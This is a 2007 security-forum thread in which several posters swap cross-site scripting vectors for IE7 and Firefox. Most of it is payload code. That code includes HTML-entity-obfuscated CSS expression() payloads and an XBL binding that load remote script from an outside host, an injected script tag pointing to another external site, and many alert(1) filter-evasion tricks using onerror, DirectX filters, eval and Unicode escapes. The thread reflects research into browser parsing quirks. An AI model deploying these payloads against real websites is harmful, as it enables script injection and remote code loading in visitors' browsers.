Why w3? Why w3?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

This works on IE7:-

<div id="inject"></div>
<div style="xx: &#x65&#x78&#x70&#x72&#x65&#x73&#x73&#x69&#x6F&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29&#x20&#x3A&#x20&#x31&#x29&#x3B">test</div>

It encodes a vector originally done by Martin, brilliant work btw man!
http://the-mice.co.uk/switch/?p=39

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

A combined Firefox and IE7 example:-

<div id="inject"></div>
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29 : 1);">test</div>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

XBL wherever I look... time for something new: Filters :)
Today's haiku:


exploring the world
eyes wide open
with blurry glasses

<img src=_
onerror="
this.style.filter=
'progid:DXImageTransform.Microsoft.Compositor(function=2)';
this.filters.item('DXImageTransform.Microsoft.Compositor').
Function=alert(1);
">





Edited 1 time(s). Last edit at 12/01/2007 04:01PM by .mario.

XBL and expressions :P

seriously though top work man!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Glad you liked it Gareth :) The main problem was getting IE to not go into it's stupid bloody loop, which the window.r trick nicely avoids. Also really nice work integrating that into Hackvertor - really useful as my patience with encoding things manually is fast wearing thin!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS



Edited 1 time(s). Last edit at 11/27/2007 08:44AM by Martin.

I was doing some code for backframe intervals, and I started playing with the JSON stuff..

with(document)with(body)appendChild(createElement(Script.name)).src=String(/http:/+/www.x.se/+/xm8#/).slice(1);

I didn't knew about the Script.name, and well, the urls inside regexes, I was trying to get something wihtout string manipulation, as..

/\//+/www.x.se/+/xm8#/

but that doesnt work :(

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 11/27/2007 07:28PM by sirdarckcat.

@sdc

Cool idea!

Strings can also be created using [] like this:-
String(/http:/+/www.x.se/+(/x/+[])[1]+(/m/+[])[1]+(/8/+[])[1]+(/#/+[])[1]).slice(1)

Not very pretty I know but useful if you can't use quotes

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Martin Wrote:
-------------------------------------------------------
> Glad you liked it Gareth :) The main problem was
> getting IE to not go into it's stupid bloody loop,
> which the window.r trick nicely avoids. Also
> really nice work integrating that into Hackvertor
> - really useful as my patience with encoding
> things manually is fast wearing thin!

Yeah your code was good glad you don't mind me using it. I added it to Hackvertor for the same reason :) I'm gonna keep adding stuff like this because it saves time, I know we can all write a quick script to create these vectors but it's nice to have it all in one place.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Today's haiku:


What is not known
can be found out
If tried twice

undefined='alert(1)';
eval(eval(typeof a))


I am slowly running out of stupid fantasy haikus ;)



Edited 2 time(s). Last edit at 12/01/2007 04:03PM by .mario.

That actually works? lol javascript is crazy

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

/./.__parent__.alert('sure this works')


:)



Edited 1 time(s). Last edit at 11/29/2007 06:58AM by .mario.

isn't undefined a reserved word on javascript?

pff awezome mario, awezome..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@Pei Mei DaKat:

yep - as well as NaN, Infinity and other stuff - but it's no problem to just overwrite them. Which kind of gives even new possibilities to create debugging frameworks in JS *g*

good find .Shaolin Warrior

a slightly modified version of your last one: #0={}.__parent__.alert(0)



Edited 3 time(s). Last edit at 11/29/2007 12:22PM by thornmaker.

ah - sweet cyclic references ;)

http://developer.mozilla.org/en/docs/Sharp_variables_in_JavaScript

var false=true doesnt work, but window.false=true does work, anyway, false is still false..

BTW, try this JavaScript Knowledge game :)
giorgio is the only person that passed it

http:/moltomio.heliohost.org/kuza55.php

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 11/29/2007 03:15PM by sirdarckcat.

Quote

giorgio is the only person that passed it

That's not exactly the truth ;)

Here's the soultion (encoded to avoid spoiling):

Char(49),Char(54),Char(54),Char(32),Char(52),Char(49),Char(55),Char(101),
Char(56),Char(102),Char(49),Char(100),Char(32),Char(49),Char(55),Char(53),
Char(32),Char(34),Char(73),Char(102),Char(32),Char(121),Char(111),Char(117),
Char(32),Char(99),Char(97),Char(110),Char(32),Char(115),Char(101),Char(101),
Char(32),Char(116),Char(104),Char(105),Char(115),Char(44),Char(32),Char(121),
Char(111),Char(117),Char(32),Char(119),Char(105),Char(110),Char(32),Char(58),
Char(68),Char(34)

Greetings,
.mario

Do I pass?

x=eval(eval(eval(eval(eval))), alert(/1/</xmp><script>alert(1)</script><!--));x=eval(x)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Today's haiku:


Blocking
what could stand
alone

{with(0)alert(0)}

.mario:
awezome, now we have 2 winners

Gareth:
yeah it has a XSS vuln hehe :P.. but that's not the answer :(

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

beware who defends
he needs to be the supreme
master of offense



--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Thx ma1 ;)

Today's haiku:


The black pearl
lies hidden
inside the oyster's shell

Script(XML('<_>alert(1)</_>')[0].toString())()

More FFox JS peculiarities here:
http://groups.google.com/group/google-caja-discuss/browse_thread/thread/89cc50c9e936feb6

Greetings,
.mario



Edited 1 time(s). Last edit at 12/01/2007 04:03PM by .mario.

Today's haiku:


The waves
caress the beach
before they leave

~ 0 ; throw ~ this. alert( ~ 0)

Greetings,
.mario

Another one:


finding the sane
amongst the broke
might break yourself

<a<img/src/onerror=alert(1)//<

Long time no haiku - had some work with the PHPIDS to do :)


working ones way
deep to the core
but time still goes by

(Function('{}[top].__parent__.alert(1)')())



Edited 2 time(s). Last edit at 12/13/2007 11:01AM by .mario.

Unicode can be used for function calls:-
\u0061lert(1)

:)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

even with new lines:-
alert\u000a(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

So alert
(1)

becomes:-
\u0061\u006c\u0065\u0072\u0074\u000a\u0028\u0031\u0029

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

hey Gareth, I still can't visit your site anymore, is my IP blocked or something? it's been 3 days now...